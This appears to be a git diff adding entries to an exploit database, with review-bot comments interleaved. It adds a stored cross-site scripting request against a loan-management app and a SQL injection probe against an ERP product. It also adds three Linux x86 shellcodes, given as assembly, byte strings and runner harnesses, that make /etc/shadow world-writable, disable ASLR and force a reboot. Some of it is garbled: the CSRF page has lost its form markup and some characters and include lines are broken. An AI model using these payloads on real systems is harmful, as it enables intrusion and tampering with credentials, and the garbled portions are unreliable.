diff --git a/exploits/hardware/webapps/47203.html b/exploits/hardware/webapps/47203.html
new file mode 100644
index 000000000..46a275a6f
--- /dev/null
+++ b/exploits/hardware/webapps/47203.html
@@ -0,0 +1,63 @@
+# Product : Catalyst 3850 Series Device Manager
+# Version : 3.6.10E
+# Date: 01.08.2019
+# Vendor Homepage: https://www.cisco.com
+# Exploit Author: Alperen Soydan
+# Description : The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks to verify
+the requests. This can be exploited to perform certain actions with
+administrative privileges if a logged-in user visits a malicious web site.
+@special thx:Haki Bülent Sever
+# Tested On : Win10 & KaliLinux
+
+
+Change Switch Password CSRF @Catalyst 3850 Series Device Manager
+note : You must edit the values written by "place"
+___________________________________________________________
+
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
+
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47198.txt b/exploits/multiple/webapps/47198.txt
new file mode 100644
index 000000000..12d4d9812
--- /dev/null
+++ b/exploits/multiple/webapps/47198.txt
@@ -0,0 +1,28 @@
+# Exploit Title:Web Studio Ultimate Loan Manager V2.0 - Persistent Cross Site Scripting
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: http://www.webstudio.co.zw/
+# Software Link: https://codecanyon.net/item/ultimate-loan-manager/19891884
+# Version: V2.0
+# Category: Webapps
+# Software Description : Ultimate Loan Manager is an online loam management system that allows lending businesses to manage their borrowers, loans, repayments, and collections with ease while being affordable at the same time.
+# CVE : CVE-2019-14427
+==================================================================
+
+#Description:XSS exists in WEB STUDIO Ultimate Loan Manager 2.0 by adding a branch under the Branches button that sets the notes parameter with crafted JavaScript code.
+
+
+
+POST /branch/store HTTP/1.1
+Host: target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://target/branch/create
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 68
+Cookie: XSRF-TOKEN=eyJpdiI6Imk3Y3llMlBkM0xOUHJNQ1NqYjg2dGc9PSIsInZhbHVlIjoiTmkxMlBlYnVTaHJYR0NZWWxNNEFrSE9PQ3UyUlA5OUg0eU1XUGoxWGR1UUJQbWk2KzRQVVhRTUhEMzBTWkVDMCIsIm1hYyI6Ijk0MGQxN2VhNGQzZDBhZjI4YTg4M2VkODE0NTVhNDFjNmM4MDEwM2U1NGQyOTM3N2FhZDZjMjdjNTUxYjE5ZDMifQ%3D%3D; laravel_session=U1GDgNLtFJQDdPa2jK8rb1vjWE6mkZ6XwrH0PxE7
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+_token=P31Y1Y1VoVj1yaN3lpSQfssubgRXYszMUpilyYSu&name=test¬es=%3cscript%3ealert(1)%3c%2fscript%3e
\ No newline at end of file
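Review bot: The PoC itself cannot be reviewed from this hunk — the header declares 63 added lines and the text says to edit the values marked "place", but after the underscore rule only empty added lines survive, so the form that submits the password change (its action URL, method and field names) is not visible. Presumably the HTML markup was dropped when the page was extracted; the committed file should be checked to confirm the form is present, and the advisory would be more useful if it also listed the target endpoint and parameters in plain text rather than only inside markup. No Cisco bug ID or CVE is referenced, so nothing ties the finding to a fixed release; a header line such as `# CVE / Cisco bug ID: none assigned at time of writing` makes that status explicit rather than leaving it to the reader.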
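Review bot: The request body line `name=test¬es=%3cscript%3ealert(1)%3c%2fscript%3e` has lost its parameter separator — `&not` has been turned into the `¬` character, so as written the body posts a single `name` value and never sends the `notes` parameter the description names; it should read `name=test&notes=%3cscript%3ealert(1)%3c%2fscript%3e` (this may be a rendering artifact, but the stored file needs to be checked). The advisory also ships what look like real session material — the `laravel_session` cookie, the `XSRF-TOKEN` cookie and the `_token` field — which are session-bound and should be placeholders, as was already done for `Host: target`. Because the `_token` field and `laravel_session` cookie indicate a Laravel CSRF check, this is presumably authenticated stored XSS, and the header should state the privilege required (an account allowed to create branches) so the severity can be judged.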
diff --git a/exploits/php/webapps/47199.txt b/exploits/php/webapps/47199.txt
new file mode 100644
index 000000000..4601d3114
--- /dev/null
+++ b/exploits/php/webapps/47199.txt
@@ -0,0 +1,21 @@
+# Exploit Title: WebIncorp ERP - SQL injection
+# Date: 1.8.2019.
+# Exploit Author: n1x_ [MS-WEB]
+# Vendor Homepage: https://www.webincorp.com/products/erp-software-qatar
+# Version: Every version
+# CWE : CWE-89
+
+Vulnerable parameter: prod_id (product_detail.php)
+
+[GET Request]
+
+GET https://host/product_detail.php?prod_id=x' HTTP/1.1
+Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US
+Cache-Control: max-age=0
+Cookie: PHPSESSID=t57dv7rdsvut33jroled9v6435
+Host: host
+Referer: https://host/
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6afefed2a..ea6578c73 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
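Review bot: The hunk asserts SQL injection in `prod_id` but the only evidence is a single-quote probe, `prod_id=x'`, with no response, error text, or boolean/time-based confirmation; an advisory should include at least the database error returned or a differential pair such as `prod_id=1 AND 1=1` versus `prod_id=1 AND 1=2` so the finding can be verified. `# Version: Every version` is not a testable claim — state the version actually tested and hedge the rest. There is no CVE or vendor reference, and the `PHPSESSID` value should be a placeholder; since nothing in the hunk shows the injection needs a session, that header could also be dropped to make clear the issue is reachable unauthenticated, if that is in fact the case.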
@@ -41569,3 +41569,6 @@ id,file,description,date,author,type,platform,port
 47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80
 47188,exploits/hardware/webapps/47188.py,"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming",2019-07-30,"Jacob Baines",webapps,hardware,
 47196,exploits/multiple/webapps/47196.txt,"Oracle Hyperion Planning 11.1.2.3 - XML External Entity",2019-07-31,"Lucas Dinucci",webapps,multiple,
+47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,
+47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,
+47203,exploits/hardware/webapps/47203.html,"Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery",2019-08-01,"Alperen Soydan",webapps,hardware,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index b91c0e8ad..dfd117767 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -989,4 +989,7 @@ id,file,description,date,author,type,platform
 47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86
 47108,shellcodes/linux_x86/47108.txt,"Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)",2019-07-12,"Xavier Invers Fornells",shellcode,linux_x86
 47151,shellcodes/linux_x86-64/47151.c,"Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes)",2019-07-23,"Kağan Çapar",shellcode,linux_x86-64
-47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode",2019-07-29,"Pedro Cabral",shellcode,linux_x86-64
+47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",shellcode,linux_x86-64
+47200,shellcodes/linux_x86/47200.c,"Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
+47201,shellcodes/linux_x86/47201.c,"Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
+47202,shellcodes/linux_x86/47202.c,"Linux/x86 - Force Reboot Shellcode (51 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/47200.c b/shellcodes/linux_x86/47200.c
new file mode 100644
index 000000000..44d92cf40
--- /dev/null
+++ b/shellcodes/linux_x86/47200.c
@@ -0,0 +1,87 @@
+#---------------------- DESCRIPTION -------------------------------------#
+
+; Title: chmod(“/etc/shadow”, 0666) and exit for Linux/x86 - Polymorphic
+; Author: Daniel Ortiz
+; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
+; Size: 53 bytes
+; SLAE ID: PA-9844
+
+
+#---------------------- ASM CODE ------------------------------------------#
+
+
+SECTION .data
+
+ EXIT_CALL equ 1
+ CHMOD_CALL equ 15
+
+SECTION .text
+
+
+global _start
+
+
+ _start:
+ nop
+ cdq
+
+ push byte CHMOD_CALL
+ pop eax
+
+
+ push edx
+ push byte 0x77
+ push word 0x6f64
+
+ mov esi, 0x222933f0
+ add esi, 0x3f3f3f3f
+ push esi
+ xor esi, esi
+
+ mov esi, 0x243525f0
+ add esi, 0x3f3f3f3f
+ push esi
+ xor esi, esi
+
+
+ mov ebx, esp
+ push word 0666Q
+ pop ecx
+ int 0x80
+
+ mov al, EXIT_CALL
+ int 0x80
+
+
+#------------------------- final shellcode ----------------------------------------#
+
+unsigned char buf[] =
+"\x90\x99\x6a\x0f\x58\x52\x6a\x77\x66"
+"\x68\x64\x6f\xbe\xf0\x33\x29\x22\x81"
+"\xc6\x3f\x3f\x3f\x3f\x56\x31\xf6\xbe"
+"\xf0\x25\x35\x24\x81\xc6\x3f\x3f\x3f"
+"\x3f\x56\x31\xf6\x89\xe3\x66\x68\xb6"
+"\x01\x59\xcd\x80\xb0\x01\xcd\x80";
+
+
+#------------------------- usage --------------------------------------------------#
+
+
+#include
+#include
+
+unsigned char code[] = \
+
+"\x90\x99\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\xbe\xf0\x33\x29\x22\x81\xc6\x3f\x3f\x3f\x3f\x56\x31\xf6\xbe\xf0\x25\x35\x24\x81\xc6\x3f\x3f\x3f\x3f\x56\x31\xf6\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\xb0\x01\xcd\x80";
+
+
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47201.c b/shellcodes/linux_x86/47201.c
new file mode 100644
index 000000000..24dfdc53b
--- /dev/null
+++ b/shellcodes/linux_x86/47201.c
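Review bot: `cdq` is executed at `_start` before eax holds any known value, so in an injection context where eax is negative on entry edx becomes 0xffffffff and the `push edx` meant to NUL-terminate "/etc/shadow" pushes garbage instead; the C harness typically enters with a non-negative eax, which hides this. Moving the instruction to just after `pop eax` (eax is then 15, so edx is 0) costs no bytes and makes the terminator deterministic. Separately, `push word 0666Q` followed by `pop ecx` pops four bytes, so the upper half of ecx is the first two bytes of the path ("/e") and esp ends up two bytes inside the string; chmod still succeeds only because the kernel takes the mode as a 16-bit umode_t, which is worth a comment such as `; pop reads 4 bytes: upper half of ecx is junk, kernel truncates mode to 16 bits`. The harness also declares `main()` with implicit int and prints a `size_t` with `%d`; `int main(void)` and `%zu` are needed for a clean C99+ build, and the listing should state that `code[]` must live in executable memory (e.g. built with `-z execstack`) for `ret()` to work.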
@@ -0,0 +1,102 @@
+#---------------------- DESCRIPTION -------------------------------------#
+
+; Title: Linux x86 ASLR deactivation for Linux/x86 - Polymorphic
+; Author: Daniel Ortiz
+; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
+; Size: 107 bytes
+; SLAE ID: PA-9844
+
+
+#---------------------- ASM CODE ------------------------------------------#
+
+
+SECTION .data
+
+ WRITE_SYSCALL equ 4
+
+ CLOSE_SYSCALL equ 6
+
+SECTION .text
+
+global _start
+
+
+
+_start:
+ nop
+ mov eax, 0xffffffff
+ not eax
+ push eax
+ mov esi, 0x65636170
+ push esi
+ xor esi, esi
+ mov esi, 0x735f6176
+ push esi
+ xor esi, esi
+ push dword 0x5f657a69
+ push dword 0x6d6f646e
+ push dword 0x61722f6c
+ push dword 0x656e7265
+ push dword 0x6b2f7379
+ push dword 0x732f636f
+
+ mov esi, 0x72702f2f
+ push esi
+ xor esi, esi
+
+
+ mov ebx,esp
+ mov cx,0x2bc
+ mov al,0x6
+ inc al
+ inc al
+ int 0x80
+ mov ebx,eax
+ push eax
+ mov dx,0xb01
+ add dx,0x2f2f
+ push dx
+ mov ecx,esp
+ cdq
+ inc edx
+ mov al,WRITE_SYSCALL
+ int 0x80
+ mov al,CLOSE_SYSCALL
+ int 0x80
+
+ mov al, 1
+ int 0x80
+
+
+#------------------------- final shellcode ----------------------------------------#
+
+unsigned char buf[] =
+"\x90\xb8\xff\xff\xff\xff\xf7\xd0\x50\xbe\x70\x61\x63\x65\x56\x31\xf6\xbe\x76\x61\x5f"
+"\x73\x56\x31\xf6\x68\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61\x68\x65\x72"
+"\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f\x73\xbe\x2f\x2f\x70\x72\x56\x31\xf6\x89\xe3"
+"\x66\xb9\xbc\x02\xb0\x06\xfe\xc0\xfe\xc0\xcd\x80\x89\xc3\x50\x66\xba\x01\x0b\x66\x81\xc2"
+"\x2f\x2f\x66\x52\x89\xe1\x99\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\xb0\x01\xcd\x80";
+
+
+
+#------------------------- usage --------------------------------------------------#
+
+#include
+#include
+
+unsigned char code[] = \
+
+
+"\x90\xb8\xff\xff\xff\xff\xf7\xd0\x50\xbe\x70\x61\x63\x65\x56\x31\xf6\xbe\x76\x61\x5f\x73\x56\x31\xf6\x68\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61\x68\x65\x72\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f\x73\xbe\x2f\x2f\x70\x72\x56\x31\xf6\x89\xe3\x66\xb9\xbc\x02\xb0\x06\xfe\xc0\xfe\xc0\xcd\x80\x89\xc3\x50\x66\xba\x01\x0b\x66\x81\xc2\x2f\x2f\x66\x52\x89\xe1\x99\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\xb0\x01\xcd\x80";
+
+
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47202.c b/shellcodes/linux_x86/47202.c
new file mode 100644
index 000000000..7dc5c37e0
--- /dev/null
+++ b/shellcodes/linux_x86/47202.c
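Review bot: The `mov cx,0x2bc` / `mov al,0x6; inc al; inc al` sequence relies on something the listing never states: eax ends at 8, which is sys_creat rather than sys_open, so 0x2bc in cx is creat's mode argument (ignored for an existing file) and not open(2) flags — read as flags it would be O_RDONLY|O_TRUNC and the following write would fail with EBADF. A comment such as `; eax = 8 -> creat(path, mode) == open(path, O_WRONLY|O_CREAT|O_TRUNC, mode)` above `int 0x80` would make the intent clear; note that `mov cx` also leaves the upper half of ecx undefined, harmless only because the kernel truncates mode to 16 bits. Writing "0" to /proc/sys/kernel/randomize_va_space needs root, and neither the creat nor the write result is checked, so a failure is silent and the process just exits; that precondition belongs in the header. As in the sibling file, the harness's `main()` should be `int main(void)` and `%d` should be `%zu` for the `strlen` result.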
@@ -0,0 +1,78 @@
+#---------------------- DESCRIPTION -------------------------------------#
+
+; Title: [NOT encoded] Linux/x86 Force Reboot shellcode for Linux/x86 - Polymorphic
+; Author: Daniel Ortiz
+; Tested on: Linux 4.18.0-25-generic #26 Ubuntu
+; Size: 51 bytes
+; SLAE ID: PA-9844
+
+
+#---------------------- ASM CODE ------------------------------------------#
+
+
+SECTION .data
+
+ SYSCALL_EXECVE equ 11
+
+SECTION .text
+
+global _start
+
+_start:
+ nop
+ or eax, 0xffffffff
+ not eax
+ push eax
+
+
+ mov eax, 0x8b90909d
+ not eax
+ push eax
+
+ mov eax, 0x9a8dd091
+ not eax
+ push eax
+
+ mov eax, 0x969d8cd0
+ not eax
+ push eax
+
+ xor eax, eax
+ mov ebx, esp
+ push eax
+ push word 0x662d
+ mov esi, esp
+ push eax
+ push esi
+ push ebx
+ mov ecx, esp
+ or al, SYSCALL_EXECVE
+ int 0x80
+
+
+#------------------------- final shellcode ----------------------------------------#
+
+unsigned char buf[] =
+
+"\x90\x83\xc8\xff\xf7\xd0\x50\xb8\x9d\x90\x90\x8b\xf7\xd0\x50"
+"\xb8\x91\xd0\x8d\x9a\xf7\xd0\x50\xb8\xd0\x8c\x9d\x96\xf7\xd0"
+"\x50\x31\xc0\x89\xe3\x50\x66\x68\x2d\x66\x89\xe6\x50\x56\x53\x89\xe1\x0c\x0b\xcd\x80";
+
+
+
+
+#------------------------- usage --------------------------------------------------#
+
+include
+#include
+
+char *shellcode =
+
+"\x90\x83\xc8\xff\xf7\xd0\x50\xb8\x9d\x90\x90\x8b\xf7\xd0\x50\xb8\x91\xd0\x8d\x9a\xf7\xd0\x50\xb8\xd0\x8c\x9d\x96\xf7\xd0\x50\x31\xc0\x89\xe3\x50\x66\x68\x2d\x66\x89\xe6\x50\x56\x53\x89\xe1\x0c\x0b\xcd\x80";
+
+int main(void)
+{
+fprintf(stdout,"Length: %d\n",strlen(shellcode));
+(*(void(*)()) shellcode)();
+return 0;
+}
\ No newline at end of file
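Review bot: edx is never set anywhere in the shellcode, so the envp argument to execve("/sbin/reboot", {"/sbin/reboot", "-f", NULL}, edx) is whatever the caller left in that register; unless that happens to be NULL or a valid pointer the syscall fails with EFAULT, and since nothing follows `int 0x80` execution runs off the end of the buffer. Adding `cdq` immediately after `xor eax, eax` (eax is zero there, so edx becomes 0 for a NULL envp) fixes it for one byte; `buf[]`/`shellcode` then need a `\x99` inserted after `\x31\xc0` and the header size becomes 52. The harness has `include` without its `#`, and both include lines have lost their header names (presumably `<stdio.h>` and `<string.h>`, likely a rendering artifact), and `%d` should be `%zu` for the `strlen` result. Forcing a reboot requires root; the header should state that precondition.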